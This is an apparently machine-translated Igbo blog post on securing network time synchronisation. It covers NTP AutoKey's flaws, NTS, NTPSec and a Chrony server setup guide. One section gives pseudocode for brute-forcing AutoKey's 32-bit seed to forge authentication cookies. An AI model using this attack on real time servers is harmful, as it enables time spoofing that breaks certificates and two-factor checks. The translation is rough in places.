ProHoster > Блог > Nchịkwa > Kedu ka mmekọrịta oge siri bụrụ nke echekwara

Kedu ka mmekọrịta oge siri bụrụ nke echekwara

Kedu ka mmekọrịta oge siri bụrụ nke echekwara
Kedu ka esi jide n'aka na oge ọ bụla adịghị agha ụgha ma ọ bụrụ na ị nwere otu nde nnukwu na obere ngwaọrụ na-ekwurịta okwu site na TCP/IP? A sị ka e kwuwe, onye ọ bụla n'ime ha nwere elekere, na oge kwesịrị ekwesị maka ha niile. Enweghị ike ịgbagha nsogbu a na-enweghị ntp.

Ka anyị chee maka otu nkeji na n'otu akụkụ nke akụrụngwa IT mmepụta ihe enwere ihe isi ike na imekọrịta ọrụ ka oge na-aga. Ngwa ngwa ụyọkọ ngwanrọ Enterprise malitere daa, ngalaba na-emebi emebi, ndị nna ukwu na ọnụ na njikere na-agbalịsi ike iweghachi ọnọdụ ahụ.

Ọ ga-ekwe omume na onye na-awakpo kpachaara anya na-anwa imebi oge site na mwakpo MiTM ma ọ bụ DDOS. N'ọnọdụ dị otú ahụ, ihe ọ bụla nwere ike ime:

  • Okwuntughe akaụntụ onye ọrụ ga-ekubi ume;
  • Asambodo X.509 ga-ekubi ume;
  • TOTP nyocha ihe abụọ ga-akwụsị ịrụ ọrụ;
  • nkwado ndabere na mpaghara ga-abụ ihe ochie na sistemụ ga-ehichapụ ha;
  • DNSSec ga-agbaji.

O doro anya na ngalaba IT ọ bụla nwere mmasị na ọrụ a pụrụ ịdabere na ya nke ọrụ mmekọrịta oge, ọ ga-adị mma ma ọ bụrụ na ha nwere ntụkwasị obi na nchekwa na ọrụ mmepụta ihe.

Gbajie NTP n'ime nkeji iri abụọ na ise

Usoro netwọkụ - puku afọ nwere otu peculiarity, ha anọwo oge ochie na adịghịzi mma maka ihe ọ bụla, ma dochie ha adịghị mfe ọbụna mgbe a oké egwu uka nke ịnụ ọkụ n'obi na ego na-akwakọba.

Mkpesa bụ isi maka NTP kpochapụwo bụ enweghị usoro a pụrụ ịdabere na ya maka ichebe ọgụ site na mwakpo ndị omempụ. Emeela mgbalị dị iche iche iji dozie nsogbu a. Iji nweta nke a, anyị buru ụzọ tinye usoro igodo ekekọrịtara (PSK) maka ịgbanwe igodo symmetric.

N'ụzọ dị mwute, usoro a akwụghị ụgwọ maka ihe dị mfe - ọ naghị eme nke ọma. Achọrọ nhazi akwụkwọ ntuziaka n'akụkụ ndị ahịa dabere na ihe nkesa. Nke a pụtara na ị nweghị ike itinye onye ahịa ọzọ otu ahụ. Ọ bụrụ na ihe agbanwee na sava NTP, ndị ahịa niile ga-ahazigharị.

Mgbe ahụ, ha wepụtara AutoKey, mana ha chọpụtara ozugbo ọtụtụ ọghọm dị njọ na nhazi nke algọridim n'onwe ya wee hapụ ya. Ihe bụ na mkpụrụ ahụ nwere naanị 32-bits, ọ dị obere ma enweghị mgbagwoju anya mgbakọ na mwepụ maka ọgụ ihu.

  • NJ igodo - igodo 32-bit symmetric;
  • MAC (koodu njirimara ozi) - NTP checksum ngwugwu;

A na-agbakọ igodo akpaaka dịka ndị a.

Autokey=H(Sender-IP||Receiver-IP||KeyID||Cookie)

Ebe H() bụ ọrụ hash cryptographic.

A na-eji otu ọrụ ahụ gbakọọ checksum nke ngwugwu.

MAC=H(Autokey||NTP packet)

Ọ tụgharịrị na iguzosi ike n'ezi ihe niile nke ngwungwu nyocha dabere na eziokwu nke kuki. Ozugbo ị nwere ha, ị nwere ike iweghachi autokey wee mebie MAC. Agbanyeghị, sava NTP na-eji mkpụrụ mgbe ọ na-emepụta ha. Nke a bụ ebe nwude dị.

Cookie=MSB_32(H(Client IP||Server IP||0||Server Seed))

Ọrụ MSB_32 na-ebipụ ntakịrị iri atọ na abụọ kachasị mkpa na nsonaazụ ngụkọta hash md5. Kuki onye ahịa anaghị agbanwe ma ọ bụrụhaala na paramita nkesa na-agbanwe agbanwe. Mgbe ahụ onye mwakpo ahụ nwere ike iweghachi naanị ọnụọgụ mbụ wee nwee ike ịmepụta kuki n'onwe ya.

Mbụ, ịkwesịrị ijikọ na sava NTP dịka onye ahịa wee nweta kuki. Mgbe nke a gasịrị, na-eji usoro ike dị nro, onye na-awakpo ahụ weghachi nọmba mbụ na-eso algọridim dị mfe.

Algorithm maka ịwakpo mgbako nke ọnụọgụ mbụ site na iji usoro ike brute.

   for i=0:2^32 − 1 do
        Ci=H(Server-IP||Client-IP||0||i)
        if Ci=Cookie then
            return i
        end if 
    end for

A maara adreesị IP ndị ahụ, yabụ naanị ihe fọdụrụ bụ imepụta hashes 2^32 ruo mgbe kuki emepụtara dabara nke enwetara n'aka sava NTP. Na ọdụ ụlọ mgbe niile nwere Intel Core i5, nke a ga-ewe nkeji iri abụọ na ise.

NTS - Autokey ọhụrụ

Ọ gaghị ekwe omume ịkwado oghere nchekwa dị otú ahụ na Autokey, na 2012 ọ pụtara ụdị ọhụrụ protocol. Iji mebie aha ahụ, ha kpebiri rebrand, ya mere Autokey v.2 ka akpọrọ Network Time Security.

Usoro NTS bụ ndọtị nke nchekwa NTP ma na-akwado naanị ọnọdụ unicast ugbu a. Ọ na-enye nchebe cryptographic siri ike megide aghụghọ nke ngwugwu, na-egbochi snooping, snoo nke ọma, na-eguzogide ọgwụ na-efunahụ ngwugwu netwọk, ma na-ebute obere mfu nke ziri ezi kpatara n'oge nchekwa njikọ.

Njikọ NTS nwere usoro abụọ na-eji usoro oyi akwa dị ala. Gbanye nke mbụ N'oge a, onye ahịa na ihe nkesa na-ekwenye na paramita njikọ dị iche iche yana mgbanwe kuki nwere igodo yana usoro data niile na-eso ya. Gbanye nke abụọ N'oge a, nnọkọ NTS echekwara na-ewere ọnọdụ n'etiti onye ahịa na sava NTP.

Kedu ka mmekọrịta oge siri bụrụ nke echekwara

NTS nwere protocol abụọ dị ala: Network Time Security Key Exchange (NTS-KE), nke na-ebute njikọ echekwara n'elu TLS, yana NTPv4, incarnation kacha ọhụrụ nke usoro NTP. Obere ihe banyere nke a n'okpuru.

Nzọụkwụ mbụ - NTS KE

N'oge a, onye ahịa NTP na-amalite nnọkọ TLS 1.2/1.3 maka njikọ TCP dị iche na sava NTS KE. N'oge nnọkọ a na-eme.

  • Ndị ọzọ na-ekpebi parampat AEAD algọridim maka nkeji nke abụọ.
  • Ndị otu ahụ na-akọwapụta usoro iwu nke ala nke abụọ, mana ugbu a naanị NTPv4 na-akwado.
  • Ndị otu ahụ na-ekpebi adreesị IP na ọdụ ụgbọ mmiri nke sava NTP.
  • Ihe nkesa NTS KE na-ewepụta kuki n'okpuru NTPv4.
  • Ndị otu ahụ wepụrụ otu ụzọ igodo symmetric (C2S na S2C) na ngwa kuki.

Ụzọ a nwere nnukwu uru na ibu niile nke ịnyefe ozi nzuzo gbasara paramita njikọ dabara na ụkpụrụ TLS egosipụtara na ntụkwasị obi. Nke a na-ewepụ mkpa ịmegharị wiil nke gị maka aka aka NTP echekwara.

Nkeji nke abụọ - NTP n'okpuru nchebe NTS

Na nzọụkwụ nke abụọ, onye ahịa na-emekọrịta oge ahụ na sava NTP. Maka nzube a, ọ na-ebufe ihe ndọtị anọ pụrụ iche (mpaghara ndọtị) na nhazi ngwugwu NTPv4.

  • Mgbatị njirimara Pụrụ iche nwere enweghị usoro iji gbochie mbuso agha emegharị.
  • NTS kuki Extension nwere otu kuki NTP dị onye ahịa. Ebe ọ bụ naanị onye ahịa nwere igodo C2S na S2C symmetric AAED, ihe nkesa NTP ga-ewepụrịrị ha na kuki.
  • NTS Kuki Ebe Nnọọ Ntị bụ ụzọ onye ahịa si arịọ kuki ndị ọzọ site na sava ahụ. Mgbakwunye a dị mkpa iji hụ na nzaghachi nkesa NTP adịghị ogologo karịa arịrịọ ahụ. Nke a na-enyere aka igbochi mbuso agha.
  • NTS Authenticator na ezoro ezo Extension Field Extension nwere AAED cipher na igodo C2S, NTP nkụnye eji isi mee, timestamps, na EF nke dị n'elu dị ka data na-eso. Na-enweghị ndọtị a, ọ ga-ekwe omume ịkwanye stampụ oge.

Kedu ka mmekọrịta oge siri bụrụ nke echekwara

Mgbe ị natara arịrịọ n'aka onye ahịa, ihe nkesa ahụ na-achọpụta izi ezi nke ngwugwu NTP. Iji mee nke a, ọ ga-ewepụrịrị kuki, wepụ AAED algọridim na igodo. Mgbe ịlelechara ngwugwu NTP nke ọma maka ịdị irè, ihe nkesa na-aza onye ahịa n'ụdị a.

  • Mgbatị Identifier Pụrụ Iche bụ nnomi enyo nke arịrịọ onye ahịa, ihe megidere mbuso agha mmeghari.
  • NTS kuki Mgbakwunye kuki ndị ọzọ ka ịga n'ihu na nnọkọ ahụ.
  • NTS Authenticator na ezoro ezo Extension Field Extension nwere AEAD cipher nwere igodo S2C.

Enwere ike ịmegharị aka nke abụọ ugboro ugboro, na-agafe nzọụkwụ mbụ, ebe ọ bụ na arịrịọ na nzaghachi ọ bụla na-enye onye ahịa kuki ndị ọzọ. Nke a nwere uru na arụ ọrụ TLS na-akpa ike nke ịgbakọ na ịnyefe data PKI na-ekewa site na ọnụọgụ arịrịọ ugboro ugboro. Nke a dabara adaba maka ndị na-echekwa oge FPGA pụrụ iche, mgbe enwere ike itinye ọrụ niile n'ime ọtụtụ ọrụ site na ngalaba nke cryptography, na-ebufe mkpokọta TLS na ngwaọrụ ọzọ.

NTPSec

Kedu ihe pụrụ iche gbasara NTP? N'agbanyeghị na onye edemede nke ọrụ ahụ, Dave Mills, gbalịrị idetu koodu ya dị ka o kwere mee, ọ bụ onye mmemme na-adịghị ahụkebe nke ga-enwe ike ịghọta mgbagwoju anya nke oge mmekọrịta algọridim nke dị afọ 35. Edere ụfọdụ koodu ahụ tupu oge POSIX, na Unix API mgbe ahụ dị nnọọ iche na nke a na-eji taa. Tụkwasị na nke ahụ, ọ dị mkpa ịmara ihe ndekọ ọnụ ọgụgụ iji kpochapụ mgbaàmà site na nnyonye anya na ahịrị mkpọtụ.

NTS abụghị mbọ mbụ iji dozie NTP. Ozugbo ndị mwakpo mụtara iji adịghị ike NTP mee ihe iji kwalite mwakpo DDoS, ọ bịara doo anya na mgbanwe dị ukwuu dị mkpa. Na mgbe a na-akwado ma dezie akwụkwọ NTS, US National Science Foundation na njedebe nke 2014 nyere onyinye ngwa ngwa maka imeziwanye NTP.

Ndị otu na-arụ ọrụ abụghị naanị onye na-eduzi, kama Eric Stephen Raymond - otu n'ime ndị guzobere na ogidi nke obodo Open Source na onye dere akwụkwọ ahụ Katidral na Bazaar. Ihe mbụ Eric na ndị enyi ya gbalịrị ime bụ ịkwaga koodu NTP site na ikpo okwu BitKeeper na git, mana ọ naghị arụ ọrụ otú ahụ. Onye ndu oru ngo Harlan Stenn megidere mkpebi a, mkparịta ụka kwụsịrị. Mgbe ahụ, e kpebiri ndụdụ koodu oru ngo, na NTPSec mụrụ.

Ahụmịhe siri ike, gụnyere ọrụ na GPSD, ndabere mgbakọ na mwepụ na nka anwansi nke ịgụ koodu oge ochie - Eric Raymond bụ onye hacker nke nwere ike iwepụ ụdị ọrụ a. Ndị otu ahụ chọtara ọkachamara ọpụpụ koodu na naanị 10 izu NTP biri alana GitLab. Ọrụ na-aga nke ọma.

Ndị otu Eric Raymond weghaara ọrụ ahụ n'otu ụzọ ahụ Auguste Rodin si jiri ngọngọ nkume mee. Site na iwepu 175 KLOC nke koodu ochie, ha nwere ike belata oke ọgụ site na imechi ọtụtụ oghere nchekwa.

Nke a bụ ndepụta ezughị ezu nke ndị agụnyere na nkesa:

  • Emebeghi akwụkwọ, oge ochie, emechiela ma ọ bụ gbajiri agbaji.
  • Ọbá akwụkwọ ICS ejighi ya.
  • libopts / autogen.
  • Koodu ochie maka Windows.
  • ntpdc.
  • igodo akpaaka.
  • Edegharịrị koodu ntpq C na Python.
  • Edegharịrị koodu sntp/ntpdig C na Python.

Na mgbakwunye na ihicha koodu ahụ, ọrụ ahụ nwere ọrụ ndị ọzọ. Nke a bụ ndepụta akụkụ nke mmezu:

  • Ekwalitela nchedo koodu megide oke njupụta nke ukwuu. Iji gbochie oke njupụta, arụ ọrụ eriri niile na-adịghị ize ndụ (strcpy/strcat/strtok/sprintf/vsprintf/gets) ejirila ụdị nchekwa na-emejuputa oke nha ihe nchekwa dochie ya.
  • Nkwado NTS agbakwunyere.
  • Ogologo oge emelitere izizi okpukpu iri site na ijikọ ngwaike anụ ahụ. Nke a bụ n'ihi na elekere kọmputa nke oge a aghọwo ihe ziri ezi karịa nke mgbe a mụrụ NTP. Ndị kacha rite uru na nke a bụ GPSDO na redio oge raara onwe ya nye.
  • E belatala ọnụ ọgụgụ asụsụ mmemme ka ọ bụrụ abụọ. Kama Perl, awk na ọbụna edemede S, ọ bụ Python niile. N'ihi nke a, enwere ohere ndị ọzọ maka ojiji koodu.
  • Kama noodles nke autotools scripts, oru ngo malitere iji a software ewu usoro waf.
  • Emelitere ma hazie akwụkwọ ọrụ. Site na nchịkọta akwụkwọ na-emegiderịta onwe ya na mgbe ụfọdụ, ha mepụtara akwụkwọ nwere ike ịgafe nke ọma. Mgbanwe ahịrị iwu ọ bụla na ụlọ ọrụ nhazi ọ bụla nwere otu ụdị eziokwu. Na mgbakwunye, a na-emepụta ibe mmadụ na akwụkwọ weebụ ugbu a site na otu faịlụ isi.

NTPSec dị maka ọnụọgụ nkesa Linux. N'oge a, ụdị kwụsiri ike kachasị ọhụrụ bụ 1.1.8, maka Gentoo Linux ọ bụ nke pere mpe.

(1:696)$ sudo emerge -av ntpsec
These are the packages that would be merged, in order:
Calculating dependencies... done!
[ebuild   R    ] net-misc/ntpsec-1.1.7-r1::gentoo  USE="samba seccomp -debug -doc -early -gdb -heat -libbsd -nist -ntpviz -rclock_arbiter -rclock_generic -rclock_gpsd -rclock_hpgps -rclock_jjy -rclock_local -rclock_modem -rclock_neoclock -rclock_nmea -rclock_oncore -rclock_pps -rclock_shm -rclock_spectracom -rclock_trimble -rclock_truetime -rclock_zyfer -smear -tests" PYTHON_TARGETS="python3_6" 0 KiB
Total: 1 package (1 reinstall), Size of downloads: 0 KiB
Would you like to merge these packages? [Yes/No]

Chrony

Enwere mbọ ọzọ iji dochie NTP ochie jiri ụzọ nchekwa dị nchebe karị. Chrony, n'adịghị ka NTPSec, ka edere site na ala wee chepụta ya ka ọ rụọ ọrụ ntụkwasị obi n'okpuru ọnọdụ dịgasị iche iche, gụnyere njikọ netwọk na-adịghị akwụsi ike, nnweta netwọk akụkụ ma ọ bụ mkpọkọ, na mgbanwe okpomọkụ. Na mgbakwunye, chrony nwere uru ndị ọzọ:

  • chrony nwere ike mekọrịta elekere sistemu ngwa ngwa na oke izi ezi;
  • Chrony dị obere, na-eri obere ebe nchekwa, yana ịnweta CPU naanị mgbe achọrọ ya. Nke a bụ nnukwu gbakwunyere maka ịchekwa akụ na ume;
  • chrony na-akwado stampụ ngwaike na Linux, na-enye ohere mmekọrịta zuru oke na netwọkụ mpaghara.

Agbanyeghị, chrony enweghị ụfọdụ njirimara nke NTP ochie, dị ka mgbasa ozi na onye ahịa/sava multicast. Na mgbakwunye, NTP kpochapụwo na-akwado ọnụ ọgụgụ ka ukwuu nke sistemụ arụmọrụ na nyiwe.

Iji gbanyụọ ọrụ sava na arịrịọ NTP maka usoro chronyd, dee naanị ọdụ ụgbọ mmiri 0 na faịlụ chromy.conf. A na-eme nke a n'ọnọdụ ebe ọ dịghị mkpa idobe oge maka ndị ahịa NTP ma ọ bụ ndị ọgbọ. Kemgbe ụdị 2.0, ọdụ ụgbọ mmiri NTP na-emeghe naanị mgbe enyere ikike ikike ma ọ bụ iwu dabara adaba, ma ọ bụ ahaziri ndị ọgbọ NTP, ma ọ bụ jiri ntuziaka mgbasa ozi.

Ihe omume ahụ nwere modul abụọ.

  • chronyd bụ ọrụ na-aga n'azụ. Ọ na-enweta ozi gbasara ọdịiche dị n'etiti elekere sistemụ na ihe nkesa oge mpụga ma gbanwee oge mpaghara. Ọ na-emejuputa atumatu NTP ma nwee ike rụọ ọrụ dịka onye ahịa ma ọ bụ ihe nkesa.
  • Chronyc bụ akụrụngwa ahịrị iwu maka nlekota na njikwa mmemme. A na-eji ya dozie parampat ọrụ dị iche iche, dịka ọmụmaatụ na-enye gị ohere ịgbakwunye ma ọ bụ wepu sava NTP ka chronyd na-aga n'ihu na-agba ọsọ.

Kemgbe ụdị 7 nke RedHat Linux na -eji chrony dị ka ọrụ mmekọrịta oge. Ngwungwu a dịkwa maka nkesa Linux ndị ọzọ. Ụdị kwụsiri ike kachasị ọhụrụ bụ 3.5, na-akwado maka mwepụta nke v4.0.

(1:712)$ sudo emerge -av chrony
These are the packages that would be merged, in order:
Calculating dependencies... done!
[binary  N     ] net-misc/chrony-3.5-r2::gentoo  USE="adns caps cmdmon ipv6 ntp phc readline refclock rtc seccomp (-html) -libedit -pps (-selinux)" 246 KiB
Total: 1 package (1 new, 1 binary), Size of downloads: 246 KiB
Would you like to merge these packages? [Yes/No]

Otu esi edobe sava chrony nke dịpụrụ adịpụ na ịntanetị iji mekọrịta oge na netwọk ụlọ ọrụ. N'okpuru ebe a bụ ihe atụ nke ịtọlite ​​​​VPS.

Ọmụmaatụ nke ịtọlite ​​Chrony na RHEL/CentOS na VPS

Ka anyị mee ntakịrị ihe ma guzobe sava NTP nke anyị na VPS. Ọ dị nnọọ mfe, naanị họrọ tarifu kwesịrị ekwesị na webụsaịtị RuVDS, nweta ihe nkesa emebere ma pịnye iwu iri na abụọ dị mfe. Maka ebumnuche anyị, nhọrọ a dabara adaba.

Kedu ka mmekọrịta oge siri bụrụ nke echekwara

Ka anyị gaa n'ihu n'ịtọlite ​​​​ọrụ wee buru ụzọ wụnye ngwungwu chrony.

[root@server ~]$ yum install chrony

RHEL 8 / CentOS 8 na-eji njikwa ngwugwu dị iche.

[root@server ~]$ dnf install chrony

Mgbe ị wụnye chrony, ịkwesịrị ịmalite ma rụọ ọrụ ahụ.

[root@server ~]$ systemctl enable chrony --now

Ọ bụrụ na-ịchọrọ, ịnwere ike ịme mgbanwe na /etc/chrony.conf, dochie sava NPT na mpaghara kacha nso iji belata oge nzaghachi.

# Use public servers from the pool.ntp.org project.
# Please consider joining the pool (http://www.pool.ntp.org/join.html).
server 0.ru.pool.ntp.org iburst
server 1.ru.pool.ntp.org iburst
server 2.ru.pool.ntp.org iburst
server 3.ru.pool.ntp.org iburst

Ọzọ, anyị na-edozi mmekọrịta nke ihe nkesa NTP nwere ọnụ site na ọdọ mmiri akọwapụtara.

[root@server ~]$ timedatectl set-ntp true
[root@server ~]$ systemctl restart chronyd.service

Ọ dịkwa mkpa imeghe ọdụ ụgbọ mmiri NTP n'èzí, ma ọ bụghị na firewall ga-egbochi njikọ na-abata site na ọnụ ahịa ndị ahịa.

[root@server ~]$ firewall-cmd --add-service=ntp --permanent 
[root@server ~]$ firewall-cmd --reload

N'akụkụ ndị ahịa, o zuru ezu ịtọ mpaghara oge n'ụzọ ziri ezi.

[root@client ~]$ timedatectl set-timezone Europe/Moscow

Faịlụ /etc/chrony.conf na-akọwapụta IP ma ọ bụ aha nnabata nke ihe nkesa VPS anyị na-agba ọsọ nkesa NTP chrony.

server my.vps.server

Na n'ikpeazụ, ịmalite mmekọrịta oge na onye ahịa.

[root@client ~]$ systemctl enable --now chronyd
[root@client ~]$ timedatectl set-ntp true

Oge ọzọ m ga-agwa gị ụdị nhọrọ dị maka ịmekọrịta oge na-enweghị ịntanetị.

Kedu ka mmekọrịta oge siri bụrụ nke echekwara

Kedu ka mmekọrịta oge siri bụrụ nke echekwara

isi: www.habr.com

Tinye a comment